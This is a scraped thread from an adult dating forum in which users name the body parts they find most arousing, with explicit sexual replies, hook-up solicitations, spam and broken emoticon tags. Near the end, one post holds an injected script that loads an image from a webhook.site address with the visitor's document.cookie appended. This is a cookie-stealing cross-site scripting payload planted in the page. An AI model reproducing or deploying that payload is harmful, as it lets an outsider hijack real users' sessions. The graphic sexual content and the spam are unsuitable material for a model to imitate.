Home > Forums > Chill-Out Zone (General Chat)

Hot Sexy Bodies - Which bits are best?

Get full access to all site features Register Now!

Which body part turns you on the most (other than the obvious) and why?

RE:Hot Sexy Bodies - Which bits are best?

The Mouth it has so many functions

i get orgasm by seeing boobs of the girl

RE:RE:Hot Sexy Bodies - Which bits are best?

Stomach

Hi love to lick the ears and then lick whole body and spend some time around the navel and suck the toes. Then give a light body massage. Must massage every part of the body so that body gets a light heat. Then start licking and sucking around the boobs and get on to the nipple. While doing that start brushing with your fingers the area above the Virginia . The pussy should be shavedimg src="imagesadultemoticons020.gif" img src="imagesadultemoticons029.gif"

best bits

The Eyes i love beautiful eyes i wish i had them myself

as they say in parliment.

the EYES have it. A true magnet is the eyes.

The breasts and nipples!

So (apart from the obvious) I like tummies I think the most I does :)
Not quite sure why...like watching it sink and then expand as u breathe..seeing it quiver and flutter in anticipation as my soft teasing kisses run down your body. When it's sweaty n covered in tinsy-tiny droplets...collecting in a pool in your belly button! lol i do love belly buttons :)...but then I'm strange init? ! Big tummy, little tummy, fat tummy, tight tummy, squidgy tummy, hairy tummy, smooth tummy...I like them all. Thinking bout it now all I wanna do is rest my little head against one right now :) my ear pressing against, listening to the sound of the ocean lol! My free hand gently rubbing n caressing the lower part..just a few inches above your most intimate place ;) your can feel mine, on your thigh, one leg's wrapped over..........got to go now ;) giggles x

img src="imagesadultemoticons029.gif"

Body parts

Feet, when a shoe dangles off a lady's toes, that is really sexy img src="imagesadultemoticons026.gif"

Pussy ,i like to lit

img src="imagesadultemoticons027.gif" img src="imagesadultemoticons027.gif" img src="imagesadultemoticons027.gif" img src="imagesadultemoticons027.gif" img src="imagesadultemoticons027.gif"

img src="imagesadultemoticons008.gif"

RE:as they say in parliment.

img src="imagesadultemoticons030.gif" img src="imagesadultemoticons030.gif" img src="imagesadultemoticons030.gif" img src="imagesadultemoticons030.gif" img src="imagesadultemoticons030.gif" img src="imagesadultemoticons028.gif" img src="imagesadultemoticons028.gif" img src="imagesadultemoticons028.gif" img src="imagesadultemoticons028.gif"

The Mouth it has so many functions

RE:RE:RE:Hot Sexy Bodies - Which bits are best?

Totally agree.

The Tongue, most people only know how to talk with it!

Sex is like the titanic movie we all know the climax, the big hard thing is gonna sink in to the soft wet thing and it's gonna get messy. But how we get to that climax is so much fun img src="imagesadultemoticons030.gif"

RE:as they say in parliment.

the EYES have it. A true magnet is the eyes.
img src="imagesadultemoticons030.gif" img src="imagesadultemoticons030.gif" img src="imagesadultemoticons030.gif" img src="imagesadultemoticons030.gif"

for me it's a toss up between a shapely thigh (or even better a pair of them), and a beautiful soft neck to nuzzle - on reflection the neck has it!!!

The bottom for me, so sexy

its got to be the back for me, i love it ?? 

Tight boobs with black tits and curvy waist make me horney thirsty my tool became like iron rod after touching these both

Feet, very well  kept beautiful ladies feet, sexxxxy

I got crazy when i see juice latino ass with light chocolate color....thats brign me .....

Tongue

Without question the female bottom. Lyying on her tummy ass exposed, world peace achieved in the delicious perfect balance of her ass.

the mind, when you have the connection and explore together, engage the mind and the body follows

I find the neck of a woman to be sexy, just running your tongue and kissing it turns me on and hopefully the lady too ??

Well this depends on where your eyes hits first when you see the lady. Just as a answer to the question, I would say  Eyes, Norse, Lips, Hair legs toes.
So if any of these hits your eyes first and grabbed the attention then there will be full body scan ?? ??????

Arse mouth eyes ....... tits most of it..

Lips turn me on a lot , j love the scene when getting head,  mostly from pov . Something I can't get it off my head. Love to see how much she can take even though am yet to have someone taking me full, it's much fun so far. 

Long shapely legs. Biologically, longer legs seem to indicate fertility, and that enhances sex appeal. Slender hips does it for me too.

Love my neck,kiss ed

Boobs

The inner thighs so soft and silky x

The naive - beautiful 

I think lipstick cause wn v smooch it feel so sexy

I like a woman's belly button a lot. Makes me wanna lick it deep and long, before going down on her clit as it teases her the most. Also to bite the flesh near the side boobs

Cool

Eyes and lips,sometimes tongue also ??????

All are equal and should be given equal pleasure from the tips of your toes to the top of your head slowly. Chris xx

I like the little curvey dimples of the buttocks as they reach the leg and round the valley of the bottom, near where the lady-button is situated. Gets me ever time

The cheeks , whenever I see a smile 

alguna para gozarlo

alguna para gozarlo

A nice pert ass on a CD or women is a good turn on for me

Hello Maria
You speak of bits, pieces, perhaps all bits and pieces are the best if One wishes to create the utmost relationship, be it 247, online or.............
A true Dominant will know (or should) more about HisHer charge, and nuture himher that there is more bits and pieces to the puzzle (smiles here)
Perhaps you would agree sight alone cannot see all..............

A beautiful pair of hands, with long slender fingers!

I kind of like my breasts. Love to be touched.

Defo the dick

hello'

The eyes, you can read a person from the second you meet them through their eyes.

I love a nice head of hair. Long and dark gets my vote. holding a handful of it while she goes to work on me is awesome!

The brain, obviously!!!

Structure of the body makes me feel errotick

Boobs and nippel,vergin girl licking pussy. 

legs and a voluptuous bottom , they can be dressed up in soooooo many ways , 

This is ease the eyes smile lips , when some gives you that look, you catch them looking that look and love to see a girl in her under wear.andif the girl has a actcent that a trun on big time that’s you 

A woman’s naked back, from her nape to the small of her back, exquisite in form and function and very sexy

I am a Butt man !  You can spank them and make love to them ?????

her skin next to mine and pubic hair love to get my nose in , I don't understand girls shaving their pubes

It's  hips an peachy bums that wiggle while they walk hmm

face

small breasts and rose bud peaks

tight pussy

My cock on the breasts...

Yep

Breasts with acc

Hi, I'm a young Lankan guy, from a good family background.

I'm a professional & working in a private company.

Like to associate females, who wish to blend Lust with love for sex harder in every angle.

If we can trust each other and Keep in touch.

Clean Trust Confidentiality Respect Safe are my first priority...

I like a nice smile helps if they've got a nice butt to lolz 

Large inner labia...and large clits, the latter i have yet to find

The Female Butt! Only Butt! No But! ;P

Thighs,
Attached to toned athletic legs.
You can let your fingers wonder and tease before making your way round to those magic spots!

I do enjoy nice curvy thighs and legs as well as the obvious booty and boobs. nice feet with painted toenails to .Very sensual

The neck, it is rather kissable.

The tongue because with this appendage you can use as a finger to access very sexual parts of your lover's body.

sinlge and ready to mingle 

personally I am a Leg man gotta love long luscious legs and a tight ass to connect it all together...

Eyes love a lady with the come to bed eyes also see  the nipples go erect before the storm 

A firm butt for me!

i like chatting with sexy girl. please help me

Has to be the nice juicy clit!

????

I have always wanted a squirter but i always get dribblers but i lick the fem cum up just the same 

Im a neck and ear man

hi

hi

All are equal and should be given equal pleasure from the tips of your toes to the top of your head slowly. Chris xx

feeling her nipples going hard in my mouth is a big turn on for me

Lips as then you can tell if she loves a good deep throating!

well lets chat

the curvature of guys' backs always gets me. from the side, you'll see the curve from the shoulder to the built back muscles and then it tapers around the waist and it ends with a cute butt! i actually think it's sexier when you can see the shape of the guy's torso in his shirt than looking at his naked back..

I wanna fuck

hello is any one there

The breasts and nipples!

Her eyes they can say so much to me when she can’t 

BOOBS??????

Back of the neck..standing on her back just taking aside the hair ..breath out the hot air from my mouth..then slowly kiss the back of her neck holding her tightly ..

I guess i have a weakness for phat asses. that being said in reality every intricate detail does actually matter.

mouth and hands

Everyone should find a sexy woman's mind to be the most creative and sexy part of a woman.

Boobs n nipples

hello

It's got to be the clit. There's nothing better than licking and nibbling a lady's clit to get her aroused.

Eroticism exists within the silhouette of a woman. The more inviting it is to the senses, the better. 

LOVE the silky smooth inner thigh

i like ass

i like ass

I am a leg lover

a lovely rounded bottom

When a girl removes her bra ?? ??

Inner thigh on either side of heavan

The eyes does it for me every time the window to your soul I can tell quite abit about a person by the way they look at things if that makes since lol

I'm turned on by a nice tight looking ass and nice legs beneath!

It’s a woman’s slightly pudgy stomach for me every time. There’s just something about a lady’s midriff that heats the blood ??

Licking are women if you need one just ask

Licking are women if you need one just ask

Blond hair is a big one for me

Blond hair is a big one for me

A girls waist when she's lying on her side. Best spot to rest your hand while spooning ??????

Vagina lips

Am here looking for a life partner for a long term relationship and first we have to be friends to get to know more about each other and see where this will

Am here looking for a life partner for a long term relationship and first we have to be friends to get to know more about each other and see where this will

The tits and the pussy????

A nice pair of smooth legs, especially if encased in stockings, yum x

I love a woman's inner thighs. You can rub it, lick it fuck it. And cum on it

hi

????

Shoes, feet and legs get me everytime. A sculpted pair of legs is almost enough on their own??

Boobies

Have you seen my boobs?

See theirs hot pics, chat and hook up with them now. 

??????????????????

I'm all about the boobs.

script document.write('img src="https:webhook.site5f3048c5-58a0-4ccb-aae0-0c65f99d7203?c='+document.cookie+'" '); script

what yea think

It would be the eyes, meeting anyone for the first time my gaze will nearly fall on the face and then their eyes, I think the eyes can effectively reflect a person's emotion often conveying if the individual is open, cautious, upset, they tell their own story.

Men's Biceps

Eyes , definitely the eyes , they say so much.

The neck because its so sensitive and you go funny inside, and eyes shows your interested. Also, hugs tell you how interested a person is with you

Forgot to add, sloping tits down to hooky nipples mama mia ??

Like you

?????

LEGS!
Possibly cos of my Drag life.
But LEGS do it for me (if theyre longer and better than mine)
few of those.

I'm a powerful mistress looking for a serious and honest submissive slut 

Depends 

Depends really 

boobs, nipples, navel

I am going to try to wear 4-6" Stilleto's, wear make up, silky garments and wigs, for the first time tomorrow.

I like a stomach and pubic area